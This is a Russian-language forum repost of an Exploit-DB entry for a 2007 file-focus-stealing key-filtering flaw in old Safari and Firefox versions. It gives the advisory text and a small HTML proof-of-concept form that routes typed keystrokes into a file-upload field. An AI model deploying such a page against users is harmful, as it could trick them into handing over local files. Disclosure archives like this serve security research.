Exploit Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filterings

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30838
Проверка EDB
  1. Пройдено
Автор
CARL HARDWICK
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2007-12-01
HTML:
source: https://www.securityfocus.com/bid/26669/info

Multiple web browsers are prone to a JavaScript key-filtering vulnerability because the browsers fail to securely handle keystroke input from users.

Exploiting this issue requires that users manually type sensitive data. This may require substantial typing from targeted users, so attackers will likely use keyboard-based games, blogs, or other similar pages to entice users to enter the required keyboard input. 

<html>
<title>Firefox 2.0.0.11 File Focus Stealing vulnerability</title>
<body>
<form>
<label>
<input type="file" name="foo" />
<br>
<input type="text" name="bar"  />
</label>
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы